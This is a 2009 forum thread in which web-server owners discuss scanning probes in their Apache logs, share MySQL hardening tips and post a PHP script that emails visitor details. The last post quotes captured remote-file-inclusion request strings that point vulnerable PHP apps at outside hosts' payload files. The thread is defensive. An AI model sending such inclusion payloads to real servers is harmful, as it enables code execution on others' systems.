Think someone's messing with me?

***glennzo*** · #1 14th August 2009, 11:49 PM

From my httpd log today, I see this,

Quote:

[Fri Aug 14 08:32:28 2009] [error] [client 216.129.119.13] File does not exist: /var/www/moin/mywiki/index.php
[Fri Aug 14 10:20:15 2009] [error] [client 60.13.126.151] File does not exist: /var/www/moin/mywiki/scripts
[Fri Aug 14 10:20:16 2009] [error] [client 60.13.126.151] File does not exist: /var/www/moin/mywiki/scripts
[Fri Aug 14 10:20:17 2009] [error] [client 60.13.126.151] File does not exist: /var/www/moin/mywiki/phpMyAdmin
[Fri Aug 14 10:20:17 2009] [error] [client 60.13.126.151] File does not exist: /var/www/moin/mywiki/sql
[Fri Aug 14 10:20:18 2009] [error] [client 60.13.126.151] File does not exist: /var/www/moin/mywiki/mysql
[Fri Aug 14 10:50:18 2009] [error] [client 87.101.133.57] File does not exist: /var/www/moin/mywiki/index.php
[Fri Aug 14 13:43:08 2009] [error] [client 61.160.216.63] File does not exist: /var/www/moin/mywiki/prx.php
[Fri Aug 14 15:32:47 2009] [error] [client 76.189.248.12] File does not exist: /var/www/moin/mywiki/index.php
[Fri Aug 14 15:51:23 2009] [error] [client 91.199.207.60] File does not exist: /var/www/moin/mywiki/phpMyAdmin
[Fri Aug 14 15:51:23 2009] [error] [client 91.199.207.60] File does not exist: /var/www/moin/mywiki/phpmyadmin
[Fri Aug 14 17:51:24 2009] [error] [client 122.227.164.96] File does not exist: /var/www/moin/mywiki/fastenv

Is this normal stuff or is someone playing around trying to see just what's installed and what they can access?

Oh! Crap! That's your IP? Too bad.

pete_1967 · #2 15th August 2009, 02:55 AM

Quote:

Originally Posted by glennzo

Is this normal stuff or is someone playing around trying to see just what's installed and what they can access?

Yes to both.

Most probably script kiddies trying to be 1337 h4xxx0rrs since they're looking for database related files and apps mainly (and in not very smart way). Just make sure that if you have PhpMyAdmin installed, it's properly configured and if you got MySQL, you've dropped the test database, changes super user from root to something else and use strong password, and other MySQL users only have minimum privileges (at most have all privs on specific database only).
Since there are only few IP#s, you could drop them/ their ISPs mail informing that their systems have been compromised.

***glennzo*** · #3 15th August 2009, 09:21 AM

No phpMyAdmin or MySql installed. So I'm safe there. Thanks for your interest Pete.

CD-RW · #4 17th August 2009, 08:39 AM

I get an email every time someone hits my homepages. I have put this code at the top of each homepage:

Quote:

<?php

require "class.Notify.php";

$mail = new Notify();

$subject = 'www.x.y.z homepage visited';

// don't send emails when browsing from localhost
// xxx.xxx.xxx.xxx == eth0 card static IP address
if ('127.0.0.1' == $_SERVER['REMOTE_ADDR']
OR 'xxx.xxx.xxx.xxx' == $_SERVER['REMOTE_ADDR']) {
echo "No mail sent!";
}
else {
$mail->notify_me($subject);
}

?>

The class that sends me an email each time someone lands on my homepage is:

Quote:

<?php

class Notify {

// private $DEBUG = true;
private $DEBUG = false;

private $remote_address;
private $hostname;
private $server_protocol;
private $request_uri;
private $http_user_agent;
private $subject;
private $message;

public function __construct() {
// echo "In Notify constructor ";
$this->remote_address = $_SERVER['REMOTE_ADDR']. "\r\n\r\n";
$this->hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']). "\r\n\r\n";
$this->server_protocol = $_SERVER['SERVER_PROTOCOL'] . "\r\n\r\n";
$this->request_uri = $_SERVER['REQUEST_URI'] . "\r\n\r\n";
$this->http_user_agent = $_SERVER['HTTP_USER_AGENT'] . "\r\n\r\n";
$this->subject = 'www.x.y.z homepage visited';

$this->message = "Remote Address: " . $this->remote_address;
$this->message .= "Remote Hostname: " .$this->hostname;
$this->message .= "Server Protocol: " .$this->server_protocol;
$this->message .= "Request URI: " . $this->request_uri;
$this->message .= "User Agent: " . $this->http_user_agent;

if ($this->DEBUG) $this->showValues();
}

function showValues() {
// echo "In showValues() ";
echo "Remote Address: " . $this->remote_address. " ";
echo "Remote Hostname: " .$this->hostname. " ";
echo "Server Protocol: " .$this->server_protocol. " ";
// echo "HTTP Referer: " .$this->http_referer. " ";
echo "Request URI: " . $this->request_uri. " ";
echo "User Agent: " . $this->http_user_agent. " ";
echo "Subject: " . $this->subject. " ";
echo " Message: " . $this->message. " ";
}

//--------------------------------------------------------

function notify_me($subject) {
$to = 'me@hostname.localdomain';

$headers = 'From: webmaster@hostname' . "\r\n" .
'Reply-To: webmaster@hostname' . "\r\n" .
'X-Mailer: PHP/' . phpversion();

mail($to, $subject, $this->message, $headers);

/*
if ( mail($to, $subject, $this->message, $headers) ) {
echo "mail sent OK!";
}
else {
echo "Problem sending mail -

";
}
*/
}

}
?>

Interesting to see what XSS attacks are happening. Saves me having to browse through the apache logs

Some examples:

Subject: www.x.y.z homepage visited

Remote Address: 80.91.189.9

Remote Hostname: node.seoms.net

Server Protocol: HTTP/1.1

Request URI:
///?_PHPLIB[libdir]=http://www.samjinenginc.com/board/readme.txt??

User Agent: libwww-perl/5.810

Subject: www.x.y.z homepage visited

Remote Address: 75.127.70.4

Remote Hostname: ez19.ez-web-hosting.com

Server Protocol: HTTP/1.1

Request URI:
//?_SERVER[DOCUMENT_ROOT]=http://neu_2.lasrv-1.de/web/.v6/id.txt???

User Agent: libwww-perl/5.810